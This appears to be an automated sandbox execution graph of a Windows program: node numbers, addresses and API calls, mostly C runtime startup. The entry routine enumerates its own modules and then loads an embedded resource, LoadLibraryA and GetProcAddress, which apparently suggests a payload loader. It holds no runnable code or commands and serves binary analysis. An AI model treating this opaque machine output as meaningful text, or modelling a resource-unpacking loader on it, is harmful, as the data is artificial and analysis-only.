                                                                                                                                        execution_graph 14227 41074f 14230 41075b 14227->14230 14228 41085d 14229 410773 14232 410781 14229->14232 14233 40b6b5 63 API calls 14229->14233 14230->14228 14230->14229 14231 40b6b5 63 API calls 14230->14231 14231->14229 14234 41078f 14232->14234 14236 40b6b5 63 API calls 14232->14236 14233->14232 14235 41079d 14234->14235 14237 40b6b5 63 API calls 14234->14237 14238 4107ab 14235->14238 14239 40b6b5 63 API calls 14235->14239 14236->14234 14237->14235 14240 4107b9 14238->14240 14241 40b6b5 63 API calls 14238->14241 14239->14238 14242 4107c7 14240->14242 14244 40b6b5 63 API calls 14240->14244 14241->14240 14243 4107d8 14242->14243 14245 40b6b5 63 API calls 14242->14245 14246 40d6e0 63 API calls 14243->14246 14244->14242 14245->14243 14247 4107e0 14246->14247 14248 410805 14247->14248 14249 4107ec InterlockedDecrement 14247->14249 14263 410869 14248->14263 14249->14248 14250 4107f7 14249->14250 14250->14248 14253 40b6b5 63 API calls 14250->14253 14253->14248 14254 40d6e0 63 API calls 14255 410819 14254->14255 14256 41084a 14255->14256 14257 414661 8 API calls 14255->14257 14266 410875 14256->14266 14261 41082e 14257->14261 14260 40b6b5 63 API calls 14260->14228 14261->14256 14262 414489 63 API calls 14261->14262 14262->14256 14269 40d606 LeaveCriticalSection 14263->14269 14265 410812 14265->14254 14270 40d606 LeaveCriticalSection 14266->14270 14268 410857 14268->14260 14269->14265 14270->14268 14637 4059d0 14640 4057b0 14637->14640 14639 4059e0 14641 4057d3 14640->14641 14642 4059c6 14640->14642 14641->14642 14643 40b84d 63 API calls 14641->14643 14642->14639 14645 4057e3 14643->14645 14644 405921 14644->14639 14645->14644 14646 40b84d 63 API calls 14645->14646 14649 405847 14646->14649 14647 40591c 14648 405160 102 API calls 14647->14648 14648->14644 14649->14647 14650 4058e6 14649->14650 14651 40592b 14649->14651 14653 40b84d 63 API calls 14650->14653 14652 40b84d 63 API calls 14651->14652 14654 40590b 14652->14654 14653->14654 14654->14647 14655 40bfc1 63 API calls 14654->14655 14656 405961 14655->14656 14657 405970 14656->14657 14658 40597c 14656->14658 14668 40cb9d 14657->14668 14671 40c953 14658->14671 14661 40597a 14661->14647 14662 40598c 14661->14662 14663 405992 14662->14663 14664 405000 77 API calls 14662->14664 14663->14639 14665 4059aa 14664->14665 14691 40c8e5 14665->14691 14667 4059b3 14667->14639 14704 40cad9 14668->14704 14670 40cbaf 14670->14661 14672 40c95f 14671->14672 14673 40c96f 14672->14673 14674 40c9a3 14672->14674 14675 40c996 14672->14675 14676 40bfc1 63 API calls 14673->14676 14679 40c9af 14674->14679 14685 40c9da 14674->14685 14678 40bfc1 63 API calls 14675->14678 14677 40c974 14676->14677 14681 40e744 6 API calls 14677->14681 14682 40c984 14678->14682 14680 40bfc1 63 API calls 14679->14680 14680->14677 14681->14682 14682->14661 14683 40ca8a 14684 411e5b 66 API calls 14683->14684 14686 40ca8f 14684->14686 14685->14673 14685->14683 14687 40caa8 14686->14687 14688 40ca98 14686->14688 14976 40cad1 14687->14976 14689 40bfc1 63 API calls 14688->14689 14689->14682 14692 40c8f1 14691->14692 14693 40c91c 14692->14693 14694 40c8ff 14692->14694 14696 40fb29 64 API calls 14693->14696 14695 40bfc1 63 API calls 14694->14695 14697 40c904 14695->14697 14698 40c924 14696->14698 14699 40e744 6 API calls 14697->14699 14700 40c748 67 API calls 14698->14700 14703 40c914 14699->14703 14701 40c930 14700->14701 14979 40c949 14701->14979 14703->14667 14707 40cae5 14704->14707 14705 40caf8 14706 40bfc1 63 API calls 14705->14706 14708 40cafd 14706->14708 14707->14705 14709 40cb2d 14707->14709 14710 40e744 6 API calls 14708->14710 14723 411e5b 14709->14723 14712 40cb0d 14710->14712 14712->14670 14713 40cb32 14714 40cb46 14713->14714 14715 40cb39 14713->14715 14716 40cb6d 14714->14716 14717 40cb4d 14714->14717 14718 40bfc1 63 API calls 14715->14718 14741 411f93 14716->14741 14719 40bfc1 63 API calls 14717->14719 14718->14712 14719->14712 14724 411e67 14723->14724 14725 40d6e0 63 API calls 14724->14725 14738 411e75 14725->14738 14726 411eea 14766 411f8a 14726->14766 14727 411ef1 14729 411c75 63 API calls 14727->14729 14731 411efb 14729->14731 14730 411f7f 14730->14713 14731->14726 14732 41389c InitializeCriticalSectionAndSpinCount 14731->14732 14735 411f20 14732->14735 14733 40d61d 63 API calls 14733->14738 14734 40fb6a 64 API calls 14734->14738 14736 411f2b 14735->14736 14737 411f3e EnterCriticalSection 14735->14737 14740 40b6b5 63 API calls 14736->14740 14737->14726 14738->14726 14738->14727 14738->14733 14738->14734 14739 40fbd8 2 API calls 14738->14739 14739->14738 14740->14726 14742 411fb5 14741->14742 14743 411fc9 14742->14743 14753 411fe8 14742->14753 14744 40bfc1 63 API calls 14743->14744 14745 411fce 14744->14745 14748 40e744 6 API calls 14745->14748 14746 412215 14776 4162c0 14746->14776 14747 4121fb 14749 40bfc1 63 API calls 14747->14749 14752 40cb78 14748->14752 14751 412200 14749->14751 14754 40e744 6 API calls 14751->14754 14763 40cb93 14752->14763 14753->14747 14762 4121a5 14753->14762 14770 41668f 14753->14770 14754->14752 14756 412170 14756->14747 14756->14756 14773 41650b 14756->14773 14759 41650b 98 API calls 14760 4121be 14759->14760 14761 41650b 98 API calls 14760->14761 14760->14762 14761->14762 14762->14746 14762->14747 14764 40fb9c 2 API calls 14763->14764 14765 40cb9b 14764->14765 14765->14712 14769 40d606 LeaveCriticalSection 14766->14769 14768 411f91 14768->14730 14769->14768 14779 416525 14770->14779 14772 4166a4 14772->14756 14792 4162e0 14773->14792 14832 4161f4 14776->14832 14778 4162db 14778->14752 14780 41653c 14779->14780 14791 416535 14779->14791 14781 40ec86 73 API calls 14780->14781 14782 416548 14781->14782 14783 4165a6 14782->14783 14784 41657b 14782->14784 14782->14791 14786 40bfc1 63 API calls 14783->14786 14783->14791 14785 40bfc1 63 API calls 14784->14785 14787 416580 14785->14787 14789 4165b3 14786->14789 14788 40e744 6 API calls 14787->14788 14788->14791 14790 40e744 6 API calls 14789->14790 14790->14791 14791->14772 14793 40ec86 73 API calls 14792->14793 14794 4162f4 14793->14794 14795 416316 14794->14795 14796 41633c 14794->14796 14806 41219e 14794->14806 14807 417d0f 14795->14807 14798 416341 14796->14798 14799 41636f 14796->14799 14800 40bfc1 63 API calls 14798->14800 14802 40bfc1 63 API calls 14799->14802 14799->14806 14801 416346 14800->14801 14804 40e744 6 API calls 14801->14804 14803 41637c 14802->14803 14805 40e744 6 API calls 14803->14805 14804->14806 14805->14806 14806->14759 14806->14762 14810 417d1f 14807->14810 14813 417d51 14807->14813 14809 417d24 14812 40bfc1 63 API calls 14809->14812 14810->14809 14810->14813 14811 417d39 14811->14806 14814 417d29 14812->14814 14816 417c1d 14813->14816 14815 40e744 6 API calls 14814->14815 14815->14811 14817 417c33 14816->14817 14828 417c58 14816->14828 14818 40ec86 73 API calls 14817->14818 14819 417c3e 14818->14819 14820 417c43 14819->14820 14821 417c78 14819->14821 14822 40bfc1 63 API calls 14820->14822 14823 417c82 14821->14823 14831 417caa 14821->14831 14824 417c48 14822->14824 14825 40bfc1 63 API calls 14823->14825 14826 40e744 6 API calls 14824->14826 14827 417c87 14825->14827 14826->14828 14829 40e744 6 API calls 14827->14829 14828->14811 14829->14828 14830 4168fc 98 API calls 14830->14831 14831->14828 14831->14830 14835 416200 14832->14835 14833 416213 14834 40bfc1 63 API calls 14833->14834 14836 416218 14834->14836 14835->14833 14837 416251 14835->14837 14838 40e744 6 API calls 14836->14838 14843 415ad5 14837->14843 14842 416227 14838->14842 14842->14778 14844 415afa 14843->14844 14903 418153 14844->14903 14847 40e61c 10 API calls 14853 415b25 14847->14853 14848 415b5e 14849 40bfd4 63 API calls 14848->14849 14850 415b63 14849->14850 14851 40bfc1 63 API calls 14850->14851 14852 415b6d 14851->14852 14854 40e744 6 API calls 14852->14854 14853->14848 14855 415c1e 14853->14855 14883 415b7c 14854->14883 14909 415660 14855->14909 14857 415cc0 14858 415ce1 CreateFileA 14857->14858 14859 415cc7 14857->14859 14861 415d7b GetFileType 14858->14861 14862 415d0e 14858->14862 14860 40bfd4 63 API calls 14859->14860 14865 415ccc 14860->14865 14863 415d88 GetLastError 14861->14863 14864 415dcc 14861->14864 14866 415d47 GetLastError 14862->14866 14870 415d22 CreateFileA 14862->14870 14868 40bfe7 63 API calls 14863->14868 14927 41541b 14864->14927 14869 40bfc1 63 API calls 14865->14869 14867 40bfe7 63 API calls 14866->14867 14871 415cd6 14867->14871 14872 415db1 CloseHandle 14868->14872 14869->14871 14870->14861 14870->14866 14875 40bfc1 63 API calls 14871->14875 14872->14871 14874 415dbf 14872->14874 14876 40bfc1 63 API calls 14874->14876 14875->14883 14876->14871 14877 41600a 14880 416177 CloseHandle CreateFileA 14877->14880 14877->14883 14879 4118c4 65 API calls 14881 415e51 14879->14881 14882 4161a2 GetLastError 14880->14882 14880->14883 14885 40bfd4 63 API calls 14881->14885 14896 415e60 14881->14896 14884 40bfe7 63 API calls 14882->14884 14899 416292 14883->14899 14886 4161ae 14884->14886 14885->14896 14887 41549c 64 API calls 14886->14887 14887->14883 14888 4118c4 65 API calls 14888->14896 14889 410a0b 66 API calls 14889->14896 14890 40fd32 73 API calls 14890->14896 14892 40f944 97 API calls 14892->14896 14893 414f8f 65 API calls 14893->14896 14894 416072 14895 410a0b 66 API calls 14894->14895 14897 416079 14895->14897 14896->14877 14896->14888 14896->14889 14896->14890 14896->14892 14896->14893 14896->14894 14936 417ee1 14896->14936 14898 40bfc1 63 API calls 14897->14898 14898->14883 14900 416297 14899->14900 14901 4162be 14899->14901 14975 415639 LeaveCriticalSection 14900->14975 14901->14842 14904 418162 14903->14904 14905 415b16 14903->14905 14906 40bfc1 63 API calls 14904->14906 14905->14847 14905->14853 14907 418167 14906->14907 14908 40e744 6 API calls 14907->14908 14908->14905 14910 41566c 14909->14910 14911 40d61d 63 API calls 14910->14911 14912 41567c 14911->14912 14913 40d6e0 63 API calls 14912->14913 14914 415681 14912->14914 14922 415690 14913->14922 14914->14857 14915 415769 14917 411cba 63 API calls 14915->14917 14920 415772 14917->14920 14918 40d6e0 63 API calls 14918->14922 14919 415711 EnterCriticalSection 14921 415721 LeaveCriticalSection 14919->14921 14919->14922 14923 415599 64 API calls 14920->14923 14926 4157d3 14920->14926 14921->14922 14922->14915 14922->14918 14922->14919 14924 41389c InitializeCriticalSectionAndSpinCount 14922->14924 14922->14926 14967 415733 14922->14967 14923->14926 14924->14922 14970 4157f1 14926->14970 14928 415482 14927->14928 14929 415429 14927->14929 14930 40bfc1 63 API calls 14928->14930 14929->14928 14934 41544d 14929->14934 14931 415487 14930->14931 14932 40bfd4 63 API calls 14931->14932 14933 415478 14932->14933 14933->14877 14933->14879 14933->14896 14934->14933 14935 415472 SetStdHandle 14934->14935 14935->14933 14937 414f8f 65 API calls 14936->14937 14938 417f00 14937->14938 14939 417f63 14938->14939 14941 414f8f 65 API calls 14938->14941 14940 40bfc1 63 API calls 14939->14940 14942 417f6e 14939->14942 14940->14942 14945 417f1c 14941->14945 14942->14896 14943 417ffe 14949 414f8f 65 API calls 14943->14949 14963 418067 14943->14963 14944 417f42 GetProcessHeap HeapAlloc 14947 417f5e 14944->14947 14955 417f75 14944->14955 14945->14939 14945->14943 14945->14944 14946 414f8f 65 API calls 14946->14939 14948 40bfc1 63 API calls 14947->14948 14948->14939 14950 418017 14949->14950 14950->14939 14951 415522 63 API calls 14950->14951 14952 41802d SetEndOfFile 14951->14952 14954 41804a 14952->14954 14952->14963 14953 40f211 95 API calls 14953->14955 14956 40bfc1 63 API calls 14954->14956 14955->14953 14957 417fe1 14955->14957 14966 417fb8 14955->14966 14958 41804f 14956->14958 14959 40bfd4 63 API calls 14957->14959 14960 40bfd4 63 API calls 14958->14960 14961 417fe6 14959->14961 14962 41805a GetLastError 14960->14962 14965 40bfc1 63 API calls 14961->14965 14961->14966 14962->14963 14963->14939 14963->14946 14964 417fc6 GetProcessHeap HeapFree 14964->14963 14965->14966 14966->14964 14973 40d606 LeaveCriticalSection 14967->14973 14969 41573a 14969->14922 14974 40d606 LeaveCriticalSection 14970->14974 14972 4157f8 14972->14914 14973->14969 14974->14972 14975->14901 14977 40fb9c 2 API calls 14976->14977 14978 40cad7 14977->14978 14978->14682 14980 40fb9c 2 API calls 14979->14980 14981 40c951 14980->14981 14981->14703 13985 40aedb 13990 40aecb 13985->13990 13988 40aef4 13989 40aec0 64 API calls 13989->13988 13993 40cfdc 13990->13993 13992 40aed9 13992->13988 13992->13989 13994 40cfe8 13993->13994 13995 40d6e0 63 API calls 13994->13995 14000 40cfef 13995->14000 13996 40d028 14003 40d043 13996->14003 13998 40d039 13998->13992 13999 40d01f 14001 40b6b5 63 API calls 13999->14001 14000->13996 14000->13999 14002 40b6b5 63 API calls 14000->14002 14001->13996 14002->13999 14006 40d606 LeaveCriticalSection 14003->14006 14005 40d04a 14005->13998 14006->14005 11901 40cbdd 11902 40cbe9 11901->11902 11936 40d534 HeapCreate 11902->11936 11905 40cc46 11938 41087e GetModuleHandleW 11905->11938 11909 40cc57 11972 411a15 11909->11972 11910 40cbb4 63 API calls 11910->11909 11912 40cc66 11913 40cc72 GetCommandLineA 11912->11913 12108 40e79a 11912->12108 11987 412892 11913->11987 11920 40cc97 12026 41255f 11920->12026 11921 40e79a 63 API calls 11921->11920 11924 40cca8 12041 40e859 11924->12041 11925 40e79a 63 API calls 11925->11924 11927 40ccb0 11928 40ccbb 11927->11928 11929 40e79a 63 API calls 11927->11929 12047 4019f0 OleInitialize 11928->12047 11929->11928 11931 40ccd8 11932 40ccea 11931->11932 12097 40ea0a 11931->12097 12115 40ea36 11932->12115 11935 40ccef 11937 40cc3a 11936->11937 11937->11905 12100 40cbb4 11937->12100 11939 410892 11938->11939 11940 410899 11938->11940 12118 40e76a 11939->12118 11942 410a01 11940->11942 11943 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11940->11943 12177 410598 11942->12177 11945 4108ec TlsAlloc 11943->11945 11948 40cc4c 11945->11948 11949 41093a TlsSetValue 11945->11949 11948->11909 11948->11910 11949->11948 11950 41094b 11949->11950 12122 40ea54 11950->12122 11955 41046e 6 API calls 11956 41096b 11955->11956 11957 41046e 6 API calls 11956->11957 11958 41097b 11957->11958 11959 41046e 6 API calls 11958->11959 11960 41098b 11959->11960 12139 40d564 11960->12139 11967 4104e9 6 API calls 11968 4109df 11967->11968 11968->11942 11969 4109e6 11968->11969 12159 4105d5 11969->12159 11971 4109ee GetCurrentThreadId 11971->11948 12483 40e1d8 11972->12483 11974 411a21 GetStartupInfoA 11975 411cba 63 API calls 11974->11975 11981 411a42 11975->11981 11976 411c60 11976->11912 11977 411bdd GetStdHandle 11982 411ba7 11977->11982 11978 411c42 SetHandleCount 11978->11976 11979 411cba 63 API calls 11979->11981 11980 411bef GetFileType 11980->11982 11981->11976 11981->11979 11981->11982 11984 411b2a 11981->11984 11982->11976 11982->11977 11982->11978 11982->11980 11985 41389c InitializeCriticalSectionAndSpinCount 11982->11985 11983 411b53 GetFileType 11983->11984 11984->11976 11984->11982 11984->11983 11986 41389c InitializeCriticalSectionAndSpinCount 11984->11986 11985->11982 11986->11984 11988 4128b0 GetEnvironmentStringsW 11987->11988 11989 4128cf 11987->11989 11990 4128c4 GetLastError 11988->11990 11991 4128b8 11988->11991 11989->11991 11992 412968 11989->11992 11990->11989 11993 4128eb GetEnvironmentStringsW 11991->11993 11998 4128fa WideCharToMultiByte 11991->11998 11994 412971 GetEnvironmentStrings 11992->11994 11995 40cc82 11992->11995 11993->11995 11993->11998 11994->11995 12001 412981 11994->12001 12013 4127d7 11995->12013 11999 41295d FreeEnvironmentStringsW 11998->11999 12000 41292e 11998->12000 11999->11995 12003 411c75 63 API calls 12000->12003 12002 411c75 63 API calls 12001->12002 12004 41299b 12002->12004 12005 412934 12003->12005 12006 4129a2 FreeEnvironmentStringsA 12004->12006 12007 4129ae 12004->12007 12005->11999 12008 41293c WideCharToMultiByte 12005->12008 12006->11995 12011 4129b8 FreeEnvironmentStringsA 12007->12011 12009 412956 12008->12009 12010 41294e 12008->12010 12009->11999 12012 40b6b5 63 API calls 12010->12012 12011->11995 12012->12009 12014 4127f1 GetModuleFileNameA 12013->12014 12015 4127ec 12013->12015 12017 412818 12014->12017 12490 41446b 12015->12490 12484 41263d 12017->12484 12020 40cc8c 12020->11920 12020->11921 12021 412854 12022 411c75 63 API calls 12021->12022 12023 41285a 12022->12023 12023->12020 12024 41263d 73 API calls 12023->12024 12025 412874 12024->12025 12025->12020 12027 412568 12026->12027 12029 41256d 12026->12029 12028 41446b 107 API calls 12027->12028 12028->12029 12030 411cba 63 API calls 12029->12030 12033 40cc9d 12029->12033 12036 4125a2 12030->12036 12031 412600 12032 40b6b5 63 API calls 12031->12032 12032->12033 12033->11924 12033->11925 12034 411cba 63 API calls 12034->12036 12035 412626 12037 40b6b5 63 API calls 12035->12037 12036->12031 12036->12033 12036->12034 12036->12035 12038 40ef42 63 API calls 12036->12038 12039 4125e7 12036->12039 12037->12033 12038->12036 12039->12036 12040 40e61c 10 API calls 12039->12040 12040->12039 12042 40e867 12041->12042 12901 413586 12042->12901 12044 40e885 12046 40e8a4 12044->12046 12905 40d2bd 12044->12905 12046->11927 12048 401ab9 12047->12048 13005 40b99e 12048->13005 12050 401abf 12051 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 12050->12051 12073 402467 12050->12073 12052 401dc3 CloseHandle GetModuleHandleA 12051->12052 12056 401c55 12051->12056 13018 401650 12052->13018 12054 401e8b FindResourceA LoadResource LockResource SizeofResource 12055 40b84d 63 API calls 12054->12055 12057 401ebf 12055->12057 12059 401c9c CloseHandle 12056->12059 12063 401cf9 Module32Next 12056->12063 13020 40af66 12057->13020 12059->11931 12060 401ecb 12061 401efc SizeofResource 12060->12061 12062 401f1c 12061->12062 12064 401fa2 FreeResource 12062->12064 12063->12052 12071 401d0f 12063->12071 12065 40b84d 63 API calls 12064->12065 12066 401fbb SizeofResource 12065->12066 12067 401fe5 12066->12067 12068 4020aa LoadLibraryA 12067->12068 12069 401650 12068->12069 12070 40216c GetProcAddress 12069->12070 12070->12073 12074 4021aa 12070->12074 12071->12059 12072 401dad Module32Next 12071->12072 12072->12052 12072->12071 12073->11931 12074->12073 13032 4018f0 12074->13032 12076 40243f 12076->12073 12077 40b6b5 63 API calls 12076->12077 12077->12073 12078 4021f1 12078->12076 13044 401870 12078->13044 12080 402269 #8 12081 401870 75 API calls 12080->12081 12082 40228b #8 12081->12082 12083 4022a7 12082->12083 12084 4022d9 #15 #23 12083->12084 13049 40b350 12084->13049 12087 40232c 12088 402354 #16 12087->12088 12089 40235b 12087->12089 12088->12089 12090 402392 #411 12089->12090 12091 4023a4 12090->12091 12092 4023bc #9 #9 12091->12092 13051 4019a0 12092->13051 12095 40242e 12096 4019a0 66 API calls 12095->12096 12096->12076 13193 40e8de 12097->13193 12099 40ea1b 12099->11932 12101 40cbc2 12100->12101 12102 40cbc7 12100->12102 12103 40ec4d 63 API calls 12101->12103 12104 40eaa2 63 API calls 12102->12104 12103->12102 12105 40cbcf 12104->12105 12106 40e7ee 4 API calls 12105->12106 12107 40cbd9 12106->12107 12107->11905 12109 40ec4d 63 API calls 12108->12109 12110 40e7a4 12109->12110 12111 40eaa2 63 API calls 12110->12111 12112 40e7ac 12111->12112 12113 4104e9 6 API calls 12112->12113 12114 40cc71 12113->12114 12114->11913 12116 40e8de 63 API calls 12115->12116 12117 40ea41 12116->12117 12117->11935 12119 40e775 Sleep GetModuleHandleW 12118->12119 12120 40e793 12119->12120 12121 40e797 12119->12121 12120->12119 12120->12121 12121->11940 12183 4104e0 12122->12183 12124 40ea5c 12186 41393d 12124->12186 12127 41046e 6 API calls 12128 40ea98 12127->12128 12129 41046e TlsGetValue 12128->12129 12130 4104a7 GetModuleHandleW 12129->12130 12131 410486 12129->12131 12133 4104c2 GetProcAddress 12130->12133 12134 4104b7 12130->12134 12131->12130 12132 410490 TlsGetValue 12131->12132 12137 41049b 12132->12137 12135 41049f 12133->12135 12136 40e76a 2 API calls 12134->12136 12135->11955 12138 4104bd 12136->12138 12137->12130 12137->12135 12138->12133 12138->12135 12140 40d56f 12139->12140 12142 40d59d 12140->12142 12189 41389c 12140->12189 12142->11942 12143 4104e9 TlsGetValue 12142->12143 12144 410501 12143->12144 12145 410522 GetModuleHandleW 12143->12145 12144->12145 12146 41050b TlsGetValue 12144->12146 12147 410532 12145->12147 12148 41053d GetProcAddress 12145->12148 12152 410516 12146->12152 12150 40e76a 2 API calls 12147->12150 12149 41051a 12148->12149 12149->11942 12153 411cba 12149->12153 12151 410538 12150->12151 12151->12148 12151->12149 12152->12145 12152->12149 12156 411cc3 12153->12156 12155 4109c5 12155->11942 12155->11967 12156->12155 12157 411ce1 Sleep 12156->12157 12194 40e231 12156->12194 12158 411cf6 12157->12158 12158->12155 12158->12156 12462 40e1d8 12159->12462 12161 4105e1 GetModuleHandleW 12162 4105f1 12161->12162 12163 4105f7 12161->12163 12164 40e76a 2 API calls 12162->12164 12165 410633 12163->12165 12166 41060f GetProcAddress GetProcAddress 12163->12166 12164->12163 12167 40d6e0 59 API calls 12165->12167 12166->12165 12168 410652 InterlockedIncrement 12167->12168 12463 4106aa 12168->12463 12171 40d6e0 59 API calls 12172 410673 12171->12172 12466 4145d2 InterlockedIncrement 12172->12466 12174 410691 12478 4106b3 12174->12478 12176 41069e 12176->11971 12178 4105a2 12177->12178 12179 4105ae 12177->12179 12180 4104e9 6 API calls 12178->12180 12181 4105d0 12179->12181 12182 4105c2 TlsFree 12179->12182 12180->12179 12181->12181 12182->12181 12184 41046e 6 API calls 12183->12184 12185 4104e7 12184->12185 12185->12124 12187 41046e 6 API calls 12186->12187 12188 40ea8e 12187->12188 12188->12127 12193 40e1d8 12189->12193 12191 4138a8 InitializeCriticalSectionAndSpinCount 12192 4138ec 12191->12192 12192->12140 12193->12191 12195 40e23d 12194->12195 12196 40e255 12195->12196 12206 40e274 12195->12206 12207 40bfc1 12196->12207 12200 40e2e6 HeapAlloc 12200->12206 12203 40e26a 12203->12156 12206->12200 12206->12203 12213 40d6e0 12206->12213 12220 40def2 12206->12220 12226 40e32d 12206->12226 12229 40d2e3 12206->12229 12232 4106bc GetLastError 12207->12232 12209 40bfc6 12210 40e744 12209->12210 12211 4104e9 6 API calls 12210->12211 12212 40e754 12211->12212 12214 40d6f5 12213->12214 12215 40d708 EnterCriticalSection 12213->12215 12257 40d61d 12214->12257 12215->12206 12217 40d6fb 12217->12215 12218 40e79a 62 API calls 12217->12218 12219 40d707 12218->12219 12219->12215 12223 40df20 12220->12223 12221 40dfb9 12225 40dfc2 12221->12225 12457 40db09 12221->12457 12223->12221 12223->12225 12450 40da59 12223->12450 12225->12206 12461 40d606 LeaveCriticalSection 12226->12461 12228 40e334 12228->12206 12230 4104e9 6 API calls 12229->12230 12231 40d2f3 12230->12231 12231->12206 12246 410564 TlsGetValue 12232->12246 12235 410729 SetLastError 12235->12209 12236 411cba 60 API calls 12237 4106e7 12236->12237 12237->12235 12238 4104e9 6 API calls 12237->12238 12239 410701 12238->12239 12240 410720 12239->12240 12241 410708 12239->12241 12251 40b6b5 12240->12251 12243 4105d5 60 API calls 12241->12243 12245 410710 GetCurrentThreadId 12243->12245 12244 410726 12244->12235 12245->12235 12247 410594 12246->12247 12248 410579 12246->12248 12247->12235 12247->12236 12249 4104e9 6 API calls 12248->12249 12250 410584 TlsSetValue 12249->12250 12250->12247 12252 40b6c1 12251->12252 12253 40b714 HeapFree 12252->12253 12255 40b73d 12252->12255 12254 40b727 12253->12254 12253->12255 12256 40bfc1 62 API calls 12254->12256 12255->12244 12256->12255 12258 40d629 12257->12258 12260 40d64f 12258->12260 12283 40ec4d 12258->12283 12265 40d65f 12260->12265 12329 411c75 12260->12329 12265->12217 12267 40d680 12271 40d6e0 63 API calls 12267->12271 12268 40d671 12270 40bfc1 63 API calls 12268->12270 12270->12265 12272 40d687 12271->12272 12273 40d6bb 12272->12273 12274 40d68f 12272->12274 12276 40b6b5 63 API calls 12273->12276 12275 41389c InitializeCriticalSectionAndSpinCount 12274->12275 12277 40d69a 12275->12277 12278 40d6ac 12276->12278 12277->12278 12279 40b6b5 63 API calls 12277->12279 12334 40d6d7 12278->12334 12281 40d6a6 12279->12281 12282 40bfc1 63 API calls 12281->12282 12282->12278 12337 413d5b 12283->12337 12286 40ec61 12288 40eaa2 63 API calls 12286->12288 12290 40d63e 12286->12290 12287 413d5b 63 API calls 12287->12286 12289 40ec79 12288->12289 12291 40eaa2 63 API calls 12289->12291 12292 40eaa2 12290->12292 12291->12290 12293 40eab6 12292->12293 12294 413d5b 60 API calls 12293->12294 12325 40d645 12293->12325 12295 40ead8 12294->12295 12296 40ec16 GetStdHandle 12295->12296 12298 413d5b 60 API calls 12295->12298 12297 40ec24 12296->12297 12296->12325 12301 40ec3d WriteFile 12297->12301 12297->12325 12299 40eae9 12298->12299 12299->12296 12300 40eafb 12299->12300 12300->12325 12343 40ef42 12300->12343 12301->12325 12304 40eb31 GetModuleFileNameA 12306 40eb4f 12304->12306 12310 40eb72 12304->12310 12308 40ef42 60 API calls 12306->12308 12309 40eb5f 12308->12309 12309->12310 12311 40e61c 10 API calls 12309->12311 12322 40ebb5 12310->12322 12359 411da6 12310->12359 12311->12310 12315 413ce7 60 API calls 12318 40ebed 12315->12318 12317 40e61c 10 API calls 12320 40ebd9 12317->12320 12321 40ebfe 12318->12321 12323 40e61c 10 API calls 12318->12323 12319 40e61c 10 API calls 12319->12322 12320->12315 12377 413b7e 12321->12377 12368 413ce7 12322->12368 12323->12321 12326 40e7ee 12325->12326 12415 40e7c3 GetModuleHandleW 12326->12415 12331 411c7e 12329->12331 12332 40d66a 12331->12332 12333 411c95 Sleep 12331->12333 12419 40b84d 12331->12419 12332->12267 12332->12268 12333->12331 12449 40d606 LeaveCriticalSection 12334->12449 12336 40d6de 12336->12265 12338 413d6a 12337->12338 12339 40ec54 12338->12339 12340 40bfc1 63 API calls 12338->12340 12339->12286 12339->12287 12341 413d8d 12340->12341 12342 40e744 6 API calls 12341->12342 12342->12339 12344 40ef53 12343->12344 12345 40ef5a 12343->12345 12344->12345 12350 40ef80 12344->12350 12346 40bfc1 63 API calls 12345->12346 12347 40ef5f 12346->12347 12348 40e744 6 API calls 12347->12348 12349 40eb1d 12348->12349 12349->12304 12352 40e61c 12349->12352 12350->12349 12351 40bfc1 63 API calls 12350->12351 12351->12347 12404 40ba30 12352->12404 12354 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12355 40e725 GetCurrentProcess TerminateProcess 12354->12355 12356 40e719 12354->12356 12406 40ce09 12355->12406 12356->12355 12358 40e742 12358->12304 12360 411db8 12359->12360 12363 411dbc 12360->12363 12365 40eba2 12360->12365 12366 411e02 12360->12366 12361 40bfc1 63 API calls 12362 411dd8 12361->12362 12364 40e744 6 API calls 12362->12364 12363->12361 12363->12365 12364->12365 12365->12319 12365->12322 12366->12365 12367 40bfc1 63 API calls 12366->12367 12367->12362 12369 413cff 12368->12369 12371 413cf8 12368->12371 12370 40bfc1 63 API calls 12369->12370 12376 413d04 12370->12376 12371->12369 12374 413d33 12371->12374 12372 40e744 6 API calls 12373 40ebc8 12372->12373 12373->12317 12373->12320 12374->12373 12375 40bfc1 63 API calls 12374->12375 12375->12376 12376->12372 12378 4104e0 6 API calls 12377->12378 12379 413b8e 12378->12379 12380 413ba1 LoadLibraryA 12379->12380 12403 413c29 12379->12403 12381 413bb6 GetProcAddress 12380->12381 12384 413ccb 12380->12384 12383 413bcc 12381->12383 12381->12384 12382 413c7e 12385 4104e9 6 API calls 12382->12385 12388 41046e 6 API calls 12383->12388 12384->12325 12385->12384 12386 4104e9 6 API calls 12397 413c96 12386->12397 12387 4104e9 6 API calls 12389 413c46 12387->12389 12390 413bd2 GetProcAddress 12388->12390 12391 4104e9 6 API calls 12389->12391 12392 41046e 6 API calls 12390->12392 12395 413c53 12391->12395 12393 413be7 GetProcAddress 12392->12393 12394 41046e 6 API calls 12393->12394 12396 413bfc GetProcAddress 12394->12396 12395->12382 12395->12386 12398 41046e 6 API calls 12396->12398 12397->12382 12399 4104e9 6 API calls 12397->12399 12400 413c11 12398->12400 12399->12382 12401 413c1b GetProcAddress 12400->12401 12400->12403 12402 41046e 6 API calls 12401->12402 12402->12403 12403->12387 12403->12395 12405 40ba3c 12404->12405 12405->12354 12407 40ce11 12406->12407 12408 40ce13 IsDebuggerPresent 12406->12408 12407->12358 12414 4138fc 12408->12414 12411 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 12412 41372b GetCurrentProcess TerminateProcess 12411->12412 12413 413723 12411->12413 12412->12358 12413->12412 12414->12411 12416 40e7d7 GetProcAddress 12415->12416 12417 40e7ec ExitProcess 12415->12417 12416->12417 12418 40e7e7 CorExitProcess 12416->12418 12418->12417 12420 40b900 12419->12420 12426 40b85f 12419->12426 12421 40d2e3 6 API calls 12420->12421 12423 40b906 12421->12423 12422 40b870 12424 40ec4d 62 API calls 12422->12424 12422->12426 12428 40eaa2 62 API calls 12422->12428 12430 40e7ee 4 API calls 12422->12430 12425 40bfc1 62 API calls 12423->12425 12424->12422 12431 40b8f8 12425->12431 12426->12422 12429 40b8bc RtlAllocateHeap 12426->12429 12426->12431 12432 40b8ec 12426->12432 12433 40d2e3 6 API calls 12426->12433 12435 40b8f1 12426->12435 12437 40b7fe 12426->12437 12428->12422 12429->12426 12430->12422 12431->12331 12434 40bfc1 62 API calls 12432->12434 12433->12426 12434->12435 12436 40bfc1 62 API calls 12435->12436 12436->12431 12438 40b80a 12437->12438 